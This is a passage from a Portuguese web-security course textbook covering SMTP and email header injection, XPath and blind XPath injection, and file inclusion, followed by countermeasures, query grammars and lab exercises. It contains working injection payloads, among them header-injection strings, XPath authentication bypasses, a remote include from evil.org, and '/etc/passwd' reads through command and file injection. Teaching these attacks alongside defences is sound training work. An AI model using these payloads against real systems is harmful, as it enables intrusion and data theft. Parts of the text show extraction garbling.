14 To:outro.usuario@localhost
15 Subject:Mensagem falsa
16
17 Esta mensagem foi forjada!
18 .
19 QUIT
Outro erro comum, encontrado nesse tipo de funcionalidade, consiste em armazenar o
endereo de destinatrio em um campo escondido do formulrio, e utilizar aquele dado

diretamente na composio da mensagem.
Como se sabe, informaes em poder de usurios no so confiveis, pois podem ser
manipuladas da maneira que quiserem. Assim, um ataque possvel nesse cenrio resume-se
em interceptar a requisio aplicao e incluir uma lista de destinatrios, separados por
vrgula, no lugar do endereo original.
A ltima vulnerabilidade abordada nesta seo baseia-se na utilizao do parmetro
opcional additional_headers da funo mail() de PHP, usado para adicionar os cabealhos
From, Cc e Bcc mensagem, que devem ser separados por caracteres de finalizao de
linha (\0d e \0a). O uso normal compreende a definio do remetente, conforme endereo
de correio eletrnico preenchido pelo usurio no formulrio da aplicao.
Por fim, se a aplicao permitir que o usurio fornea caracteres de final de linha, um
usurio capaz de injetar os cabealhos Cc e Bcc, expandindo a lista de destinatrios

da mensagem, em aplicaes PHP que usam a funo mail().
Para exemplificar, considere-se o seguinte trecho de cdigo, observando que o ltimo par-
Figura 7.19
Comandos SMTP
gerados a partir das
entradas fornecidas
pelo usurio.
metro da funo mail() corresponde ao additional_headers:
333
$from=From: .$_POST[from];
$realto=$_POST[realto];
$subject=$_POST[subject];
$message=$_POST[message];
$ret = mail($realto, $subject, $message, $from);
Fornecendo um valor similar ao abaixo, para o parmetro from da requisio, consegue-se
realizar o ataque e injetar o cabealho desejado:
evil%40evil.org%0d%0aCc%3aoutro%40localhost
Note-se que a entrada utiliza codificao URL, o que implica que, em requisies POST, ela
deve ser fornecida por meio de um proxy de interceptao, para que no seja duplamente
codificada. O processo mais simples, no caso de requisies GET, pois o valor final do parmetro pode ser definido diretamente na barra de endereos do navegador web.
Para verificar se uma dada aplicao vulnervel injeo de comandos SMTP e de cabealhos de e-mail, o seguinte roteiro pode ser executado:
1.
Liste todos os formulrios, identificados na fase de mapeamento, que parecem interagir

com o servio de correio eletrnico.
2. Para cada um deles, realize os seguintes testes:

2.1.Adulterao de destinatrio:
2.1.1.
Verifique se o endereo do destinatrio especificado em um campo escondido.
2.1.2. Em caso positivo, altere o valor do campo para um e-mail externo que controla,
e veja se recebe a mensagem enviada, o que confirma a vulnerabilidade.
2.1.3
Se o teste anterior falhar, repita a verificao com um endereo local, para o

qual tenha acesso.
2.2.Injeo de cabealhos de e-mail:
2.2.1
Habilite um proxy de interceptao e envie, em seguida, nova mensagem, por

meio da aplicao.
2.2.2
Adicione %0d%0aCc%3aSeuEmail%40SeuDominio ao final do parmetro que

indica o remetente, e veja se recebe a mensagem na caixa de entrada da conta
especificada. Se isto acontecer, a aplicao est vulnervel injeo de cabea-
lhos de e-mail.
334
2.3.Injeo de comandos SMTP:
2.3.1
Insira no corpo da mensagem uma linha contendo apenas um ponto (.),

seguida por outras quaisquer, e submeta o formulrio.
2.3.2
Acesse a caixa de correio do destinatrio e veja se a mensagem chegou truncada,

o que indica o processamento do ponto como finalizador do comando DATA.
2.3.3 Caso o passo anterior no seja bem-sucedido, tente injetar uma conversao
inteira contendo os comandos MAIL, RCPT e DATA.
Injeo de XPath
XML
Extensible Markup
Language uma
linguagem definida pelo
W3C que estabelece
regras e formatos
para a codificao de
documentos.
XPath uma linguagem utilizada para acessar elementos de um documento XML, a
partir de um modelo de dados representado em formato de rvore. Uma consulta XPath

devolve um conjunto de ns do modelo ou valores atmicos, como inteiros ou cadeias de
caracteres, por exemplo.
Existem duas verses, 1.0 e 2.0, especificadas, respectivamente, em Clark e DeRose, 1999 e
Berglund et al., 2010, sendo que a ltima consiste em uma extenso da primeira e procura
fornecer compatibilidade s expresses legadas. O conjunto de funes adicionais fornecidas pela verso 2.0 facilita a explorao de aplicaes vulnerveis injeo de XPath,
porm, ela no suportada, atualmente, por todos os arcabouos de desenvolvimento.
Para executar ataques de injeo de XPath, necessrio ter, ao menos, um conhecimento
bsico da linguagem, que ser apresentado, nesta sesso, por meio de diversos exemplos
elaborados com base no documento ilustrado na Figura 7.20. O XML em questo corresponde a uma pequena base de usurios de uma aplicao e pode ser representado graficamente como na Figura 7.21.
<?xml version=1.0?>
<users>
<user id =100>
<account>esruser</account>
<password>esruser</password>
<name>Fulano de Tal</name>
<address>R: Um, 111</address>
<city>Campinas</city>
<phone>11 1111-1111</phone>
</user>
<user id =101>
<account>root</account>
<password>toor</password>
<name>Wolfgang Mozart</name>
<city>Indaiatuba</city>
<phone>22 2222-2222</phone>
</user>
<user id =102>
Figura 7.20
Documento XML
que descreve
contas de usurio.
<account>guest</account>
<address>R: Dois, 222</address>
<password>guest</password>
335
<name>Albert Einstein</name>
<address>R: Tres, 333</address>
<city>Campinas</city>
<phone>33 3333-3333</phone>
</user>
<user id =103>
<account>dba</account>
<password>dba</password>
<name>Isaac Newton</name>
<address>R: Quatro, 444</address>
<city>Sao Paulo</city>
<phone>44 4444-4444</phone>
</user>
<user id =104>
<account>bobby</account>
<password>bobby</password>
<name>Bobby Fischer</name>
<address>R: Cinco, 555</address>
<city>Sao Paulo</city>
<phone>55 5555-5555</phone>
Figura 7.21
Representao
em rvore do
documento da
Figura 7.20.
</user>
</users>
raiz
usurios
usurio
usurio
id = 100
conta
senha
nome endereo cidade
id = 101
telefone
conta senha
esruser esruser Fulano R:Um,... Campinas 11 1111... root
336
toor
nome
endereo
cidade
telefone
Wolfgang... R:Dois,... Indaiatuba 22 2222...
Uma das principais produes permitidas pela gramtica da linguagem XPath o location path, doravante denominado, simplesmente, de caminho. Este tipo de expresso, do
qual se origina o nome XPath, permite referenciar elementos na rvore que representa o
documento XML. Por exemplo, o caminho /users/user/name seleciona todos os ns name
obtidos percorrendo-se, a partir da raiz, cada componente da expresso, da esquerda para
a direita. Ressalte-se que, enquanto o primeiro / denota o n raiz e indica um caminho
absoluto, as demais instncias deste caractere iniciam um novo passo no percurso.
possvel, tambm, utilizar caminhos relativos, que iniciam em um determinado ponto
da rvore, definido por um contexto, ou em qualquer localizao da estrutura. Para isso,
devem ser empregadas barras duplas (//), antes de um passo, como em //name, que faz
com que os ns name sob user sejam selecionados, bem como quaisquer outros ns, em
outras posies, que tenham o mesmo nome. importante destacar que se pode usar //
mais de uma vez em um mesmo caminho, para expressar mltiplos percursos relativos. Por
exemplo, o caminho //users//name seleciona todos os ns name que sejam descendentes
de elementos users, localizados em qualquer ponto da rvore. Porm, se em vez disso, o
caminho fornecido fosse /users/name, considerando que ele no existe, um conjunto vazio
de elementos resultaria da consulta.
Os cenrios abordados at aqui sempre resultam em um conjunto de elementos de mesmo
tipo, independente dos valores especficos que possuem. Muitas vezes, porm, o interesse
recai em ns particulares desse conjunto, os quais podem ser obtidos por meio do uso
de predicados, que devem ser definidos entre colchetes, aps cada passo aplicvel do
caminho. Para ilustrar, considere-se a seguinte expresso:
//user[account=esruser]/name
Ela seleciona todos os ns name sob elementos user, para os quais account seja igual a
esruser. Note-se que, neste caso, account e name so irmos na hierarquia, pois ambos
tm como n pai o elemento user. Isto extremamente importante, pois a expresso
dentro de um predicado somente pode referenciar elementos que estejam acessveis dentro
do contexto do passo. Assim, //user/name[account=esruser] no encontra nada, porque
no h n account sob name. Por outro lado, //user/name[../account=esruser] e //
user/name[parent::*/account=esruser] so vlidos, pois tanto .. como parent::* fazem
com que a comparao de account com esruser ocorra no nvel hierrquico superior.
A linguagem XPath aceita os operadores lgicos, aritmticos e relacionais tradicionais, permitindo que consultas similares s seguintes sejam construdas:
1 //user[account=esruser and password=esruser]/name seleciona o n

name cujo valor Fulano de Tal.
nenhum n, porque no h elemento user cujos filhos account e password sejam

esruser e toor, respectivamente.
1 //user[account!=esruser]/name seleciona os ns name cujos valores so

Wolfgang Mozart, Albert Einstein, Isaac Newton e Bobby Fischer.
1 //user[@id<102]/name seleciona os ns name cujos valores so Fulano de Tal e

Wolfgang Mozart. Observe-se que a expresso @id denota o atributo id de elementos user e a forma abreviada de attribute::id.
1 //user[account=esruser and password=toor]/name no seleciona
337
Alm desses operadores, algumas das funes existentes na linguagem so fundamentais

para a execuo dos ataques:
1 count() retorna o nmero de ns do conjunto passado como argumento.

1 name() devolve o nome do primeiro n, considerando-se a ordem do documento, do
conjunto passado como argumento.
1 position() retorna um nmero que corresponde posio da expresso avaliada,

dentro do contexto.
1 string-length() retorna o comprimento de uma cadeia de caracteres.

1 substring() retorna um pedao contnuo de uma cadeia de caracteres.
Agora que uma breve introduo linguagem XPath foi apresentada, possvel prosseguir
ao ataque de injeo que a envolve.
O problema raiz que leva vulnerabilidade o mesmo que o das demais injees,
isto , emprego de informaes no validadas de usurios, na construo dinmica de

consultas, por meio de concatenao.
Por exemplo, considere uma aplicao que exibe informaes de usurios contidas em um
documento XML, desde que sejam fornecidas credenciais vlidas de acesso. Em tal cenrio,
seja a consulta XPath construda por meio do seguinte trecho de cdigo:
$uid=$_POST[uid];
$pwd=$_POST[pwd];
...
$users = $xml->xpath(/users/user[account=.$uid. and password=
.$pwd.]);
Se forem fornecidos os valores esruser e esruser para uid e pwd, respectivamente, a
consulta XPath ilustrada a seguir executada:
/users/user[account=esruser and password=esruser]

E o n user, cujo id igual a 100, selecionado, pois os valores de account e password
esto corretos. Neste cenrio, embora a verificao desses elementos seja sempre realizada, um usurio malicioso pode acessar informaes alheias, sem conhecer senha alguma.
Basta, para isso, informar como uid o valor root or 1=1 e, como pwd, um valor qual-
quer, o que resulta na seguinte consulta, com predicado adulterado:
/users/user[account=root or 1=1 and password=P]

A expresso ser avaliada como verdadeira para todo elemento que tenha account igual a
root, uma vez que o operador or injetado necessita de apenas um operando verdadeiro
para dar esse resultado.
Analisando os exemplos acima, fcil perceber a similaridade do ataque com a injeo de
SQL. Segundo Forbes e Siddhart (2012), porm, uma grande vantagem da injeo de XPath
sobre a de SQL que no existe o conceito de usurio ou permisso em um documento
XML, como ocorre em bancos de dados. Portanto, um usurio malicioso pode obter toda
informao contida no documento, caso seja acessado por uma aplicao vulnervel.
338
O seguinte roteiro de teste pode ser executado para verificar a presena de campos vulnerveis injeo de XPath em uma aplicao web. Para cada item de entrada identificado na
fase de mapeamento:
1.
Fornea os smbolos [, ], ( e ) e *, um por vez, e veja se um erro induzido na aplicao, o que indicaria um campo potencialmente vulnervel.
2. Fornea o valor abaixo e veja se algum resultado apresentado:
or true() or
3. Se nenhum erro ocorrer, significa que a aplicao interpretou a expresso fornecida e
vulnervel injeo de XPath.
Injeo de XPath s cegas

O ataque de injeo de XPath s cegas (Klein, 2005) funciona de maneira similar s contra-
partes baseadas em linguagem SQL e em filtros LDAP, nas quais so realizadas perguntas
booleanas, para extrao de um bit de informao por vez. A tcnica til quando a
injeo, embora bem-sucedida, no permite a visualizao do resultado do ataque.
Por exemplo, a aplicao pode retornar somente o nmero de ns que satisfazem a
expresso, mas no o contedo deles, que constitui o objetivo a ser alcanado. Como
j se sabe, para um ataque s cegas funcionar, deve ser possvel identificar quando a
expresso injetada verdadeira ou falsa, o que pode ser obtido por meio de diferenas
entre as pginas de resposta fornecidas pela aplicao.
Considere-se a aplicao ilustrada na Figura 7.22(a), que conta quantos usurios, presentes
no documento XML da Figura 7.22 moram na cidade especificada, e que produz o resultado
exibido na Figura 7.22(b). O sistema pode utilizar a funo count() de XPath, para descobrir
de maneira direta o nmero de ns que atendem ao critrio de busca, ou recuperar esse
conjunto e realizar a contagem de elementos, por meio de cdigo da lgica de negcio. Em
qualquer dos dois casos, razovel supor a existncia de uma expresso que compara o
nome de cidade de cada n, com a entrada fornecida pelo usurio.
(a)
(b)
Por se tratar de um texto, o valor digitado deve ser delimitado por aspas simples ou duplas,
na construo da consulta XPath. Assim, para testar a existncia da vulnerabilidade, pode-se
fazer a pesquisa abaixo, e verificar se o total de usurios encontrados alterado:
Campinas and a=a

Assumindo que o resultado anterior se mantm, a pergunta booleana que se deseja fazer
pode ser includa do seguinte modo:
Figura 7.22
Aplicao que faz
consulta XPath:
(a) Interface
do sistema.
(b) Resultado
da pesquisa.
Campinas and <pergunta booleana> and a=a

339
Neste caso, se a pergunta for avaliada como verdadeira, a contagem permanece inalterada; seno, o total de usurios contabilizado como zero. A reconstruo do documento
XML completo, a partir das perguntas injetadas, pode ser realizada, por meio do algoritmo
ilustrado na Figura 7.23 (Forbes e Siddhart, 2012). Observe-se que um dos pilares do mtodo
consiste na recuperao de nomes e valores.
1. Obtenha o nome do n corrente.

2. Obtenha o nmero de atributos do n corrente.
3. Para cada atributo:
3.1. Obtenha o nome.
3.2. Obtenha o valor.
4. Obtenha o nmero de comentrios.
5. Para cada comentrio:
5.1. Obtenha o valor do comentrio.
6. Obtenha o nmero de ns-filhos.
7. Para cada n-filho:
7.1. Execute o Passo #1.
8. Obtenha o contedo textual do n corrente.
Para exemplificar esta tcnica bsica e fundamental, vejamos como obter o nome do n
principal do documento. A tarefa inicial consiste em descobrir o tamanho do nome do elemento, por meio das funes string-length() e name():
Campinas and string-length(name(/*))=1 and a=a

...

Em seguida, deve-se descobrir o valor do primeiro smbolo do nome da raiz, empregando-se
a funo substring():
Campinas and substring(name(/*),1,1)=a and a=a
Campinas and substring(name(/*),1,1)=b and a=a

...
Campinas and substring(name(/*),1,1)=u and a=a
O processo deve ser repetido para as demais letras do nome, resultando, no exemplo dado,
no valor users. Depois disso, procede-se descoberta do nmero de atributos do n
users (Passo #2), que zero:
Campinas and count(/users/attribute::*)=0 and a=a

O mesmo ocorrendo com o nmero de comentrios:
340
Figura 7.23
Algoritmo para
reconstruo do
documento XML por
meio de injeo de
XPath s cegas.
Campinas and count(/users/child::comment())=0 and a=a

Mas no para o nmero de ns-filhos:
Campinas and count(/users/child::*)=1 and a=a

...
Campinas and count(/users/child::*)=5 and a=a
Sempre que um n tiver mais de um filho, a funo position() deve ser empregada para
referenciar o descendente correto. Por exemplo, para se descobrir o tamanho do nome do
primeiro n-filho, as seguintes consultas devem ser efetuadas:
Campinas and string-length(name(/users/child::*[position()=1]))=1

and a=a
...
Campinas and string-length(name(/users/child::*[position()=1]))=4
and a=a
Por fim, observe-se como o valor textual de um elemento pode ser recuperado, uma vez
descobertos todos os nomes dos passos do caminho:
Tamanho do texto
Campinas and string-length(/users/user[position()=1]/name)=1 and
a=a
...
Campinas and string-length(/users/user[position()=1]/name)=13 and
a=a
Primeira letra do texto

Campinas and substring((/users/user[position()=1]/name),1,1)=A and
a=a
...
Campinas and substring((/users/user[position()=1]/name),1,1)=F and
a=a
Para recuperar as demais letras, devem ser feitas consultas semelhantes, apenas variando-se
o segundo parmetro da funo substring().
Esta tcnica gera um grande volume de requisies, para obter o mnimo de informaes do documento. Uma pequena melhoria pode ser obtida, realizando-se uma busca
binria, em cada faixa de caracteres vlidos, mas esta ainda no uma soluo ideal,
do ponto de vista de eficincia. A resposta a esse problema dada na verso 2.0 da linguagem, com a introduo da funo string-to-codepoints(), com a qual se pode restringir
Demais letras do texto
o espao de busca de maneira bem mais otimizada (Forbes e Siddhart, 2012).

341
A cobertura deste e outros avanos contemplados pela nova especificao, entretanto,

esto alm do escopo do presente trabalho.
Incluso de arquivos
Algumas linguagens, como PHP, permitem incluir e avaliar dinamicamente um arquivo
como parte do cdigo sendo executado. Essa funcionalidade comumente empregada

em sistemas que permitem ao usurio selecionar a lngua a ser utilizada ou o pas em
que se encontra, e, a partir da resposta, realizam a adaptao das mensagens, por
meio da incluso de arquivos especficos de cada idioma (Stuttard e Pinto, 2007). Se a
aplicao, simplesmente, utiliza o valor de um parmetro da requisio como argumento
da funo de incluso, um usurio malicioso pode fazer com que arquivos remotos ou
locais sejam injetados, durante o processo de gerao da resposta pela aplicao.
Note-se que, em PHP, o comando include utilizado com o propsito mencionado, permitindo
incluir arquivos remotos, caso a diretiva allow_url_include esteja definida com o valor On.
Para ilustrar o ataque, considere-se a aplicao exibida na Figura 7.24, que realiza uma
requisio GET, contendo um parmetro country, quando o usurio clica em Prosseguir.
O parmetro pode assumir os valores br e us para Brasil e Estados Unidos, respectivamente, sendo concatenado com a cadeia de caracteres .php, no lado do servidor, e
passado para a funo include.
Figura 7.24
Exemplo de aplicao vulnervel incluso de arquivos.
O que acontece se um valor como o seguinte definido para o parmetro em questo?
http%3A%2F%2Fwww.evil.org%2Fevil
Neste caso, a seguinte requisio realizada aplicao:
http://filei.esr.rnp.br/select.php?country=http%3A%2F%2Fwww.evil.
org%2Fevil&Submit1=Prosseguir
342
A qual faz com que o arquivo http://www.evil.org/evil.php seja includo, dinamicamente,

no corpo de select.php, e executado em seguida. Considere-se uma aplicao ligeiramente
diferente, que, em vez do cdigo de pas, passa o nome de arquivo a ser includo como
parmetro. Esta pequena modificao no sistema introduz uma nova vulnerabilidade, que
permite visualizar quaisquer arquivos que sejam acessveis conta de sistema operacional
usada pelo servidor web. Para alcanar este objetivo, pode-se especificar o nome do arquivo
local desejado, conforme o exemplo abaixo, o qual resulta na exibio de /etc/passwd:
http://filei.esr.rnp.br/select2.php?country=%2Fetc%2Fpasswd&Submit1=
Prosseguir
Para verificar se aplicaes so vulnerveis a estes dois ataques, os testes a seguir podem
ser realizados. Para cada item de entrada identificado na fase de mapeamento que tenha
grande chance de ser usado em um comando de incluso de arquivos:
1.
Inspecione o cdigo-fonte e veja se o valor do item de entrada corresponde a um nome

de arquivo.
1.1.Em caso positivo, intercepte a requisio e substitua-o pelo nome de outro arquivo
que se sabe estar no servidor. Verifique se a resposta apresenta algum indicativo de

que o arquivo foi includo e processado, o que indica a presena da vulnerabilidade.
1.2.Seno, intercepte a requisio e o substitua pelo nome, sem extenso, de outro
arquivo de mesmo tipo que se sabe estar no servidor. Verifique se a resposta apresenta algum indicativo de que o arquivo foi includo e processado, o que indica a
presena da vulnerabilidade.
1.3.Repita o Passo 1.1, porm usando no lugar do nome de arquivo uma URL para um
recurso que se tem controle.
Contramedidas
As principais medidas que podem ser adotadas, para evitar a ocorrncia dos mais
diversos ataques de injeo esto listadas a seguir:
1 Gerais
2 Considere que toda informao fornecida por usurios maliciosa e, assim, antes
de process-la, verifique se ela est de acordo com valores reconhecidamente
vlidos para o campo ou parmetro. Complementarmente, restrinja o tamanho do
campo ao mximo permitido.
2 No submeta a um interpretador um comando construdo dinamicamente, por

meio da concatenao direta de valores controlados pelo usurio.
1 Injeo de comandos de sistema operacional

2 Se for necessrio solicitar servios ao sistema operacional, use funes da linguagem
na qual a aplicao desenvolvida, que sejam especficas para o propsito desejado.
1 Injeo em trilhas de auditoria

2 Para cada registro individual de trilha de auditoria, calcule e armazene a assinatura
digital ou um cdigo de autenticao de mensagem.
2 Adicione, para cada registro de trilha de auditoria, um carimbo de tempo confivel,

1 Poluio de parmetros HTTP
2 Ao obter o valor de um parmetro de requisio HTTP, verifique se no foram enviadas
mltiplas instncias do mesmo elemento e se ele foi encaminhado pelo canal correto.
de quando o evento aconteceu.
343
1 Injeo em filtros LDAP

2 Utilize sempre verses atualizadas do servidor LDAP.
2 Estabelea um mximo de elementos que podem ser recuperados por meio de
uma consulta.
2 Realize a pesquisa apenas no ramo necessrio do diretrio LDAP, em vez de na

rvore inteira.
1 Injeo de comandos SMTP e de cabealhos de e-mail

2 Utilize as funcionalidades providas pelo arcabouo de desenvolvimento, para o
envio de mensagens de correio eletrnico, em vez de estabelecer uma conversao SMTP direta com o servidor.
2 Se a interao direta com o servidor de correio eletrnico for necessria, filtre as

linhas do corpo da mensagem que contenham somente um ponto (.).
2 Quando o destinatrio da mensagem for fixo, obtenha o endereo dele sempre no

lado servidor da aplicao.
2 Configure o servidor de e-mails para que no encaminhe mensagens de usurios

externos a outros domnios.
1 Injeo de XPath
2 Se o arcabouo de desenvolvimento possuir uma funo de consulta parametrizada, sempre a utilize.
2 Quando XPath 2.0 for utilizado, restrinja o acesso funo doc().

2 Nunca deixe que o cdigo da aplicao acesse outros documentos XML, que no
aqueles explicitamente permitidos.
1 Incluso de arquivos
2 Nunca passe dados fornecidos pelo usurio para funes de incluso dinmica
de arquivos.
2 Caso a escolha do arquivo a ser includo dependa de informaes fornecidas

pelo usurio, verifique se o nome resultante est presente em uma lista de
recursos permitidos.
2 Desabilite a incluso de arquivos remotos.
Medidas contra ataques
Quais as melhores medidas contra ataques de injeo?
344
Apndice Gramtica para representao textual de filtros de

busca LDAP
A seguinte gramtica, que define a representao textual de filtros de busca LDAP, consiste em
uma reproduo completa do encontrado nos documentos RFC 4515 (Smith e Howes, 2006) e
RFC 4512 (Zeilenga, 2006b).
filter
= LPAREN filtercomp RPAREN
filtercomp
= and / or / not / item
and
= AMPERSAND filterlist
or
= VERTBAR filterlist
not
= EXCLAMATION filter
filterlist
= 1*filter
item
= simple / present / substring / extensible
simple
= attr filtertype assertionvalue
filtertype
= equal / approx / greaterorequal / lessorequal
equal
= EQUALS
approx
= TILDE EQUALS
greaterorequal = RANGLE EQUALS

lessorequal
= LANGLE EQUALS
extensible
= ( attr [dnattrs]
[matchingrule] COLON EQUALS assertionvalue )
/ ( [dnattrs]
present
= attr EQUALS ASTERISK
substring
= attr EQUALS [initial] any [final]
initial
= assertionvalue
any
= ASTERISK *(assertionvalue ASTERISK)
final
= assertionvalue
attr
= attributedescription
; The attributedescription rule is defined in
; Section 2.5 of [RFC4512].
dnattrs
= COLON dn
matchingrule
= COLON oid
assertionvalue = valueencoding
matchingrule COLON EQUALS assertionvalue )
345
; The <valueencoding> rule is used to encode an

<AssertionValue>
; from Section 4.1.6 of [RFC4511].
valueencoding
= 0*(normal / escaped)
normal
= UTF1SUBSET / UTFMB
escaped
= ESC HEX HEX
DIGIT
= %x30 / LDIGIT
; 0-9
LDIGIT
= %x31-39
; 1-9
HEX
= DIGIT / %x41-46 / %x61-66 ; 0-9 / A-F / a-
f
UTF1SUBSET
= %x01-27 / %x2B-5B / %x5D-7F

; UTF1SUBSET excludes 0x00 (NUL), LPAREN,
; RPAREN, ASTERISK, and ESC.
346
EXCLAMATION
= %x21 ; exclamation mark (!)
AMPERSAND
= %x26 ; ampersand (or AND symbol) (&)
LPAREN
= %x28 ; left paren (()
RPAREN
= %x29 ; right paren ())
ASTERISK
= %x2A ; asterisk (*)
COLON
= %x3A ; colon (:)
LANGLE
= %x3C ; left angle bracket (<)
EQUALS
= %x3D ; equals sign (=)
RANGLE
= %x3E ; right angle bracket (>)
ESC
= %x5C ; backslash (\)
VERTBAR
= %x7C ; vertical bar (or pipe) (|)
TILDE
= %x7E ; tilde (~)
UTFMB
= UTF2 / UTF3 / UTF4
UTF0
= %x80-BF
UTF1
= %x00-7F
UTF2
= %xC2-DF UTF0
UTF3
= %xE0 %xA0-BF UTF0 / %xE1-EC 2(UTF0) /

%xED %x80-9F UTF0 / %xEE-EF 2(UTF0)
UTF4
= %xF0 %x90-BF 2(UTF0) / %xF1-F3 3(UTF0) /

%xF4 %x80-8F 2(UTF0)
Gramtica da linguagem XPath 1.0

A gramtica abaixo, extrada de Clark e DeRose (1999), especifica a linguagem XPath 1.0.
LocationPath
::= RelativeLocationPath
| AbsoluteLocationPath
AbsoluteLocationPath
::= / RelativeLocationPath?
| AbbreviatedAbsoluteLocationPath
RelativeLocationPath
::= Step
| RelativeLocationPath / Step
| AbbreviatedRelativeLocationPath
Step
::= AxisSpecifier NodeTest Predicate*

| AbbreviatedStep
AxisSpecifier
::= AxisName ::
| AbbreviatedAxisSpecifier
AxisName
::= ancestor
| ancestor-or-self
| attribute
| child
| descendant
| descendant-or-self
| following
| following-sibling
| namespace
| parent
| preceding
| preceding-sibling
NodeTest
::= NameTest
| NodeType ( )
| processing-instruction ( Literal
)
Predicate
::= [ PredicateExpr ]
PredicateExpr
::= Expr
| self
AbbreviatedAbsoluteLocationPath ::=
347
// RelativeLocationPath
AbbreviatedRelativeLocationPath ::=
RelativeLocationPath // Step
AbbreviatedStep
::= .
| ..
AbbreviatedAxisSpecifier::= @?
Expr
::= OrExpr
PrimaryExpr
::= VariableReference
| ( Expr )
| Literal
| Number
| FunctionCall
FunctionCall
::= FunctionName ( ( Argument ( ,

Argument )* )? )
Argument
::= Expr
UnionExpr
::= PathExpr
| UnionExpr | PathExpr
PathExpr
::= LocationPath
| FilterExpr
| FilterExpr / RelativeLocationPath
| FilterExpr // RelativeLocationPath
FilterExpr
::= PrimaryExpr
| FilterExpr Predicate
OrExpr
::= AndExpr
| OrExpr or AndExpr
AndExpr
::= EqualityExpr
| AndExpr and EqualityExpr
EqualityExpr
::= RelationalExpr
| EqualityExpr = RelationalExpr
| EqualityExpr != RelationalExpr
RelationalExpr
::= AdditiveExpr
| RelationalExpr < AdditiveExpr
| RelationalExpr > AdditiveExpr
348
| RelationalExpr <= AdditiveExpr

| RelationalExpr >= AdditiveExpr
AdditiveExpr
::= MultiplicativeExpr
| AdditiveExpr + MultiplicativeExpr
| AdditiveExpr - MultiplicativeExpr
MultiplicativeExpr
::= UnaryExpr
| MultiplicativeExpr MultiplyOperator
UnaryExpr
| MultiplicativeExpr div UnaryExpr
| MultiplicativeExpr mod UnaryExpr
UnaryExpr
::= UnionExpr
| - UnaryExpr
ExprToken
::= ( | ) | [ | ] | . | .. | @
| , | ::
| NameTest
| NodeType
| Operator
| FunctionName
| AxisName
| Literal
| Number
| VariableReference
Literal
::= [^]*
| [^]*
Number
::= Digits (. Digits?)?
Digits
::= [0-9]+
Operator
::= OperatorName
| MultiplyOperator
| / | // | | | + | - | = |
!=
| < | <= | > | >=
OperatorName
| . Digits
::= and | or | mod | div
349
MultiplyOperator
::= *
FunctionName
::= QName - NodeType
VariableReference
::= $ QName
NameTest
::= *
| NCName : *
| QName
NodeType
::= comment
| text
| processing-instruction
| node
ExprWhitespace
350
::= S
Atividade 1 Injeo de comandos de sistema operacional
Esta atividade tem por objetivo ilustrar as diversas tcnicas que podem ser usadas para
injeo de comandos de sistema operacional. Para inici-la, carregue as mquinas virtuais
do aluno e do servidor (Fedora) e execute o roteiro na primeira delas. O propsito desta atividade introduzir os conceitos de ataques de injeo de comandos de sistema operacional.
1.
2. Acesse http://oscmdi.esr.rnp.br/.
3. Digite www.esr.rnp.br no campo Nome de domnio e clique em Resolver nome.
4. Pressione Alt + [Seta para esquerda], para retornar pgina anterior.
5. Digite www.esr.rnp.br; no campo Nome de domnio, clique em Resolver nome e veja se o
resultado difere do Passo 3. Que se pode concluir com isso?

7.
Fornea o seguinte texto para o campo Nome de domnio e clique em Resolver nome:
www.esr.rnp.br;cat /etc/passwd
8. A injeo de comando de sistema operacional funcionou?
Caracteres especiais
O objetivo desta atividade testar os diversos caracteres especiais que permitem submisso de mltiplos comandos ao sistema operacional.
1.
Digite o seguinte texto no campo Nome de domnio e clique em Resolver nome:
www.esr.rnp.br | ls -l /

4. Digite o seguinte texto no campo Nome de domnio e clique em Resolver nome:
www.esr.rnp.br & ls -l /
5. Como a sada do comando ls foi concatenada original?
2. Como a sada do comando ls foi concatenada original?
351
7.
www.esr.rnp.br && ls -l /
8. O que mudou em relao ao Passo 14?
10. Digite o seguinte texto no campo Nome de domnio e clique em Resolver nome:
www.esr.rnp.br || ls -l /
11. Por que o resultado do comando injetado no foi exibido?
Introduo de pausa na execuo

Nesta atividade, a introduo de pausas na execuo, para deteco de aplicaes vulnerveis, ser explorada.
1.
www.esr.rnp.br; ping -c 15 localhost
2. Por que a pausa acontece?
Atividade 2 Injeo em trilhas de auditoria

O propsito da presente atividade introduzir ao aluno os mtodos que podem ser usados
para injeo de registros em trilhas de auditoria, quando estas so armazenadas em
arquivos de texto puro. Todos os passos devem ser executados na mquina virtual do aluno,
e altamente recomendado que se tente traar a estratgia de explorao, antes de seguir
o roteiro fornecido.
1.
2. Acesse http://logi.esr.rnp.br/logfile e veja os registros contidos na trilha de auditoria.
3. Acesse http://logi.esr.rnp.br.
352
4. Fornea esr e senha para os campos Usurio e Senha, respectivamente, e clique em Login.
6. Acesse novamente http://logi.esr.rnp.br/logfile e clique no cone Reload current page, caso
a pgina no seja atualizada.

7.
Note que o identificador de usurio foi adicionado ao final do registro.
8. Acesse novamente http://logi.esr.rnp.br.


12. Retorne ao Firefox, fornea admin e senha para os campos Usurio e Senha, respecti-
vamente, e clique em Login.

13. No WebScarab, acesse a aba Text na segunda seo da tela de interceptao.
14. Altere o valor do parmetro userid para:
admin.%0a[dd/mm/yyyy - hh:mm:ss] Conta admin se conectou com sucesso

Tal que dd/mm/yyyy e hh:mm:ss representam a data e hora atuais, respectivamente.
16. Desmarque Intercept requests.
17. No Firefox, clique em Retornar pgina de login.
18. Acesse novamente http://logi.esr.rnp.br/logfile e clique no cone Reload current page, caso
a pgina no seja atualizada. O registro foi injetado com sucesso?

Atividade 3 Poluio de parmetros HTTP

Esta atividade visa ilustrar o ataque de poluio de parmetros HTTP, alm das regras de
precedncia que so seguidas, quando parmetros de mesmo nome so submetidos em
uma requisio. Todos os passos devem ser executados na mquina virtual do aluno, e
altamente recomendado que se tente traar a estratgia de explorao, antes de seguir o
roteiro fornecido.
Precedncia em caso de parmetros repetidos

Esta atividade tem o objetivo de verificar a precedncia de parmetros repetidos adotada
por diferentes tecnologias web.
1.
2. Acesse http://hpp.esr.rnp.br/.
4. Observe a URL na barra de endereos.

6. Digite 6789 para o nmero da enquete e clique em Prosseguir.
7.
Observe a URL na barra de endereos.
353
9. Digite a seguinte URL na barra de endereos e pressione [Enter]:
http://hpp.esr.rnp.br/build_poll.php?numero=123456&numero=6789&8
Submit1=Prosseguir
10. Qual dos parmetros foi considerado pela aplicao?
11. Troque a ordem das instncias de numero, na barra de endereos:
http://hpp.esr.rnp.br/build_poll.php?numero=6789&numero=123456&8
Submit1=Prosseguir
12. O resultado foi o esperado da linguagem PHP?

16. Clique em Access Control Flaws no menu do lado esquerdo da tela.
17. Clique em Using an Access Control Matrix.
18. Observe a URL na barra de endereos e anote os valores dos parmetros Screen e Menu.
